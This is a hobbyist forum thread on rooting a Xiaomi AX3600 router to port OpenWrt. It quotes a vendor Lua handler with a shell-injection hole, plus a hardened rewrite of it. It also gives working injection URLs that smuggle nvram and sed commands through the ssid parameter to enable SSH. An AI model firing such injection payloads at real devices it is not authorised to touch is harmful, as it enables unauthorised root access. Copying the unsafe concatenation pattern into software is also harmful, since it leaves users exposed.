Adding OpenWrt support for Xiaomi AX3600 (Part 1)

Well, the vendor is claiming that the firmware is OpenWRT based:

Intelligent router operating system MiWiFi ROM based on OpenWRT deep customization

Well, QCA products run their QSDK, which is an old fork of 15.05.1 that doesn't have much resemblance to OpenWrt.

1 Like

Yep:
https://wiki.codeaurora.org/xwiki/bin/QSDK/#HCAFDownloadSteps:
https://source.codeaurora.org/quic/qsdk/oss/system/openwrt/tree/?h=NHSS.QSDK.12.0.5.r1

Got a Chinese one to Germany.
All I can do is set it up as a WiFi AP, but no admin (no browser page, the Mi-WiFi app doesn't find/identify it).
Another brick in my yard? Hopefully not! Any idea you can share how to even get the Mi-WiFi app connected?

-- Handler as extracted from the firmware's Lua. LuciHttp, XQLog, XQErrorUtil
-- and debug_level are assumed to be defined at module level in the original file
-- (not shown here).
function xxx()
    local XQFunction = require("xiaoqiang.common.XQFunction")
    local LuciUtil = require("luci.util")
    local result = {
        ["code"] = 0
    }

    -- Request parameters, taken from the HTTP form values as-is
    local ssid = LuciHttp.formvalue("ssid")
    local bssid = LuciHttp.formvalue("bssid")
    local uid = LuciHttp.formvalue("user_id")

    XQLog.log(debug_level, "ssid = "..ssid)
    XQLog.log(debug_level, "bssid = "..bssid)
    XQLog.log(debug_level, "uid = "..uid)
    -- The only check is that the values are non-empty
    if XQFunction.isStrNil(ssid)
        or XQFunction.isStrNil(bssid)
        or XQFunction.isStrNil(uid) then
        result.code = 1523
    end
    if result.code ~= 0 then
        result["msg"] = XQErrorUtil.getErrorMessage(result.code)
    else
        -- Unvalidated values are concatenated straight into a shell command line
        XQFunction.forkExec("connect -s "..ssid.." -b "..bssid.. " -u "..uid)
    end
    LuciHttp.write_json(result)
end

I think I've found the code to inject

2 Likes
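For contrast, an added example of how that handler could be written so the form values cannot alter the command; this is illustration, not code from the firmware. It reuses the names visible in the snippet above (XQFunction, LuciHttp, XQErrorUtil) and assumes they behave as their use there suggests; the validation patterns and the shell_quote helper are assumptions of this example.

```lua
-- Added example: hardened variant of the handler above (not vendor code).
-- LuciHttp, XQErrorUtil and XQFunction.forkExec are assumed to be the same
-- objects the original module uses; forkExec is assumed to take one command string.
local XQFunction = require("xiaoqiang.common.XQFunction")

-- Wrap a value in single quotes so the shell passes it through as one literal
-- argument. A single quote inside the value becomes '\'' (close, escaped, reopen).
local function shell_quote(s)
    return "'" .. tostring(s):gsub("'", "'\\''") .. "'"
end

-- Reject values that are not plausible for the field before any shell is involved.
local function valid_ssid(s)
    -- 1..32 bytes and no control characters; punctuation is allowed in SSIDs
    return type(s) == "string" and #s >= 1 and #s <= 32 and not s:find("%c")
end

local function valid_bssid(s)
    return type(s) == "string" and s:match("^%x%x:%x%x:%x%x:%x%x:%x%x:%x%x$") ~= nil
end

local function valid_uid(s)
    return type(s) == "string" and #s <= 64 and s:match("^[%w_%-]+$") ~= nil
end

function set_config_iotdev_hardened()
    local result = { ["code"] = 0 }
    local ssid  = LuciHttp.formvalue("ssid")
    local bssid = LuciHttp.formvalue("bssid")
    local uid   = LuciHttp.formvalue("user_id")

    if not (valid_ssid(ssid) and valid_bssid(bssid) and valid_uid(uid)) then
        result.code = 1523   -- same "bad parameter" code the original returns
    end
    if result.code ~= 0 then
        result["msg"] = XQErrorUtil.getErrorMessage(result.code)
    else
        -- Every value is quoted, so an SSID such as "-h; nvram set ..." reaches
        -- connect as a single literal argument rather than being parsed by the shell.
        XQFunction.forkExec("connect -s " .. shell_quote(ssid)
                            .. " -b " .. shell_quote(bssid)
                            .. " -u " .. shell_quote(uid))
    end
    LuciHttp.write_json(result)
end
```

Quoting is the minimal change when the only primitive available takes a single command string; spawning the helper with an argv array and no shell at all would remove the problem entirely.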

How to get SSH

1. Downgrade to the 1.0.17 ROM:

http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r3600/miwifi_r3600_firmware_5da25_1.0.17.bin

2. Web inject like below:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

3. The following code in /etc/init.d/dropbear needs to be commented out, then reboot to get SSH:

    if [ "$flg_ssh" != "1" -o "$channel" = "release" ]; then
            return 0
    fi

4. The default root password is calculated from the SN, and the algorithm is the same as before.

That's all, enjoy it

8 Likes

Steps 2-3 can use the URL below to inject:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h; cp /etc/init.d/dropbear /etc/init.d/dropbear_startup_backup; sed -i '/\"\$flg_ssh\"\ \!\=\ \"1\"\ \-o\ \"\$channel\"\ \=\ \"release\"/, 2d' /etc/init.d/dropbear; /etc/init.d/dropbear enable; /etc/init.d/dropbear start;

It backs up /etc/init.d/dropbear to /etc/init.d/dropbear_backup and creates a new /etc/init.d/dropbear.

Great job @LonGDikE

3 Likes

Hehe, I really should have taken a closer look at the AX3600 ubifs image when someone mentioned that all the Lua wasn't obfuscated anymore.

Would have reaaaaally simplified things.

Although I think ath11k is in pretty early stages and OpenWrt does not pull in the ath11k firmware right now either. I don't even think there's a target for the CPU yet.

Good work. :slight_smile:

Should be a fun platform to work on (assuming the boot chain isn't too locked down).

I wish I had more knowledge of what is going on here, to help you guys :smiley: But I am only a .NET developer in the Microsoft world... In my free time I keep reading the forum and all the OpenWrt stuff, so maybe someday I can help :slight_smile:

Yes, good. I'm just giving an example. It's OK to delete 3 rows with sed, but it feels dangerous if someone accidentally operates it several times.

Yes, at present only the Lua script in the 1.0.17 ROM is not obfuscated.

I just updated the injection URL; it will delete the 3 lines after the matched line, which is much safer.

1 Like

:+1:
Can you modify the previous cmds to fit it? It's a little simple. I don't study Linux commands and regular expressions very much. Hmmm.....
sed -i ':x;N;$!bx;s/if \[.*; then\n.*return 0\n.*fi/#tb/' /etc/init.d/dropbear;

1 Like

Done.

And I successfully obtained shell permission on the device.

2 Likes

That's nice.
Can you check if it has any kind of boot verification?

There is a problem with the cmds I gave. An error will be reported during execution. I want you to help me modify it to be available...
Haha...

1 Like

Could you tell me how to verify if there is any boot verification?

And here is what I got from nvram show (I removed some private information):

root@XiaoQiang:~# nvram show
CountryCode=CN
Router_unconfigured=0
boot_wait=off
bootargs=ubi.mtd=rootfs_1 root=mtd:ubi_rootfs rootfstype=squashfs rootwait
bootcmd=tftp
bootdelay=5
color=101
fdt_high=0x4A400000
flag_boot_rootfs=1
flag_boot_success=1
flag_boot_type=2
flag_flash_permission=1
flag_last_success=1
flag_ota_reboot=0
flag_show_upgrade_info=1
flag_try_sys1_failed=0
flag_try_sys2_failed=0
flash_type=2
fsbootargs=ubi.mtd=rootfs_1 root=mtd:ubi_rootfs rootfstype=squashfs
ipaddr=192.168.31.1
mode=Router
model=R3600
mtddevname=fs
mtddevnum=0
mtdids=nand0=nand0
mtdparts=mtdparts=nand0:0x23c0000@0x2dc0000(fs),
partition=nand0,0
restore_defaults=0
serverip=192.168.31.100
soc_version_major=2
soc_version_minor=0
ssh_en=1
stderr=serial
stdin=serial
stdout=serial
telnet_en=0
uart_en=0
wl0_radio=1
wl0_ssid=Xiaomi_5G
wl1_radio=1
wl1_ssid=Xiaomi
wl2_ssid=Xiaomi_E81A
nv_wan_type=
1 Like

Does the power supply have a German plug or just an adapter?

Not sure how QC's secure boot works, but try dumping U-Boot and the kernel and see if they have anything like a cert or signature attached.

If you order from China it has the Chinese plug and the seller usually includes an adapter. If Xiaomi sells it in Europe they will include a European power adapter. It is the same for other devices like the Xiaomi desktop lamp.